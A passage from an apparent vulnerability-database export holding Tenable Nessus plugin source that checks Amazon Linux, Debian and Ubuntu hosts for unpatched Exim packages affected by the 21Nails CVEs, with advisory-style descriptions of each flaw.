exim\n user, and allows a denial of service because root-owned files can be overwritten. (CVE-2020-28014)\n\n - Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or\n other consequences. This occurs because use of certain getc functions is mishandled when a client uses\n BDAT instead of DATA. (CVE-2020-28019)\n\n - Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer.\n This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands. (CVE-2020-28022)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose sensitive information from\n process memory to an unauthenticated SMTP client. 
(CVE-2020-28023)\n\n - Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers\n executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can\n actually push back non-character error codes such as EOF. (CVE-2020-28024)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the\n relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to\n a leak of sensitive information from process memory. (CVE-2020-28025)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default\n configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline\n into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary\n commands as root. (CVE-2020-28026)\n\n - Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race\n condition, a local user can delete arbitrary files as root. 
This involves the -oP and -oPX options.\n (CVE-2021-27216)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2022-1622.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28007.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28008.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28009.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28011.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28012.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28013.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28014.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28019.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28022.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28023.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28024.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28025.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2020-28026.html\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-27216.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update exim' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'exim-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-debuginfo-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-debuginfo-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-greylist-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-greylist-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mon-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mon-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mysql-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-mysql-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-pgsql-4.92-1.33.amzn1', 'cpu':'i686', 'release':'ALA', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'exim-pgsql-4.92-1.33.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T15:59:14", "description": "The Qualys Research Labs reported several vulnerabilities in Exim, a mail transport agent, which could result in local privilege 
escalation and remote code execution.\n\nDetails can be found in the Qualys advisory at https://www.qualys.com/2021/05/04/21nails/21nails.txt", "cvss3": {}, "published": "2021-05-05T00:00:00", "type": "nessus", "title": "Debian DSA-4912-1 : exim4 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28019", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2022-09-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4912.NASL", "href": "https://www.tenable.com/plugins/nessus/149275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4912. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149275);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/06\");\n\n script_cve_id(\"CVE-2020-28007\", \"CVE-2020-28008\", \"CVE-2020-28009\", \"CVE-2020-28010\", \"CVE-2020-28011\", \"CVE-2020-28012\", \"CVE-2020-28013\", \"CVE-2020-28014\", \"CVE-2020-28015\", \"CVE-2020-28017\", \"CVE-2020-28019\", \"CVE-2020-28021\", \"CVE-2020-28022\", \"CVE-2020-28023\", \"CVE-2020-28024\", \"CVE-2020-28025\", \"CVE-2020-28026\");\n script_xref(name:\"DSA\", value:\"4912\");\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"Debian DSA-4912-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Qualys Research Labs reported several vulnerabilities in Exim, a\nmail transport agent, which could result in local privilege escalation\nand remote code execution.\n\nDetails can be found in the Qualys advisory at\nhttps://www.qualys.com/2021/05/04/21nails/21nails.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.qualys.com/2021/05/04/21nails/21nails.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4912\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (buster), 
these problems have been fixed\nin version 4.92-8+deb10u6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"exim4\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"exim4-base\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"exim4-config\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"exim4-daemon-light\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"exim4-dev\", reference:\"4.92-8+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"eximon4\", reference:\"4.92-8+deb10u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T15:58:51", "description": "The remote Ubuntu 16.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in the USN-4934-2 advisory.\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-owned files anywhere on the filesystem. 
(CVE-2020-28007)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution. (CVE-2020-28008)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days). (CVE-2020-28009)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S.\n This may cause privilege escalation from exim to root. (CVE-2020-28011)\n\n - Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag. (CVE-2020-28012)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles -F '.(' on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy. (CVE-2020-28013)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten. (CVE-2020-28014)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of root processes because a recipient address can have a newline character. (CVE-2020-28015)\n\n - Exim 4 before 4.94.2 allows an off-by-two Out-of-bounds Write because -F '' is mishandled by parse_fix_phrase. (CVE-2020-28016)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. 
NOTE: remote exploitation may be difficult because of resource consumption. (CVE-2020-28017)\n\n - Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an unauthenticated remote attacker can execute arbitrary code by leveraging the mishandling of continuation lines during header-length restriction. (CVE-2020-28020)\n\n - Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer.\n This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands. (CVE-2020-28022)\n\n - Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF. (CVE-2020-28024)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory. (CVE-2020-28025)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root. (CVE-2020-28026)\n\n - Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. 
This involves the -oP and -oPX options.\n (CVE-2021-27216)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-06T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : Exim vulnerabilities (USN-4934-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28020", "CVE-2020-28022", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:exim4", "p-cpe:/a:canonical:ubuntu_linux:exim4-base", "p-cpe:/a:canonical:ubuntu_linux:exim4-config", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "p-cpe:/a:canonical:ubuntu_linux:exim4-dev", "p-cpe:/a:canonical:ubuntu_linux:eximon4"], "id": "UBUNTU_USN-4934-2.NASL", "href": "https://www.tenable.com/plugins/nessus/149323", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4934-2. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. 
Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149323);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2020-28007\",\n \"CVE-2020-28008\",\n \"CVE-2020-28009\",\n \"CVE-2020-28011\",\n \"CVE-2020-28012\",\n \"CVE-2020-28013\",\n \"CVE-2020-28014\",\n \"CVE-2020-28015\",\n \"CVE-2020-28016\",\n \"CVE-2020-28017\",\n \"CVE-2020-28020\",\n \"CVE-2020-28022\",\n \"CVE-2020-28024\",\n \"CVE-2020-28025\",\n \"CVE-2020-28026\",\n \"CVE-2021-27216\"\n );\n script_xref(name:\"USN\", value:\"4934-2\");\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"Ubuntu 16.04 LTS : Exim vulnerabilities (USN-4934-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe USN-4934-2 advisory.\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the\n log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-\n owned files anywhere on the filesystem. (CVE-2020-28007)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the\n spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header\n file, in which a crafted recipient address can indirectly lead to command execution. (CVE-2020-28008)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded\n reads that are accompanied by unbounded increases in a certain size variable. 
NOTE: exploitation may be\n impractical because of the execution time needed to overflow (multiple days). (CVE-2020-28009)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S.\n This may cause privilege escalation from exim to root. (CVE-2020-28011)\n\n - Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret\n uses a privileged pipe that lacks a close-on-exec flag. (CVE-2020-28012)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles -F '.(' on the command\n line, and thus may allow privilege escalation from any user to root. This occurs because of the\n interpretation of negative sizes in strncpy. (CVE-2020-28013)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim\n user, and allows a denial of service because root-owned files can be overwritten. (CVE-2020-28014)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of\n root processes because a recipient address can have a newline character. (CVE-2020-28015)\n\n - Exim 4 before 4.94.2 allows an off-by-two Out-of-bounds Write because -F '' is mishandled by\n parse_fix_phrase. (CVE-2020-28016)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail\n message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource\n consumption. (CVE-2020-28017)\n\n - Exim 4 before 4.92 allows Integer Overflow to Buffer Overflow, in which an unauthenticated remote attacker\n can execute arbitrary code by leveraging the mishandling of continuation lines during header-length\n restriction. 
(CVE-2020-28020)\n\n - Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer.\n This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands. (CVE-2020-28022)\n\n - Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers\n executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can\n actually push back non-character error codes such as EOF. (CVE-2020-28024)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the\n relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to\n a leak of sensitive information from process memory. (CVE-2020-28025)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default\n configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline\n into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary\n commands as root. (CVE-2020-28026)\n\n - Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race\n condition, a local user can delete arbitrary files as root. 
This involves the -oP and -oPX options.\n (CVE-2021-27216)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4934-2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:eximon4\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'exim4', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'exim4-base', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'exim4-config', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'exim4-dev', 'pkgver': '4.86.2-2ubuntu2.6+esm1'},\n {'osver': '16.04', 'pkgname': 'eximon4', 'pkgver': '4.86.2-2ubuntu2.6+esm1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n 
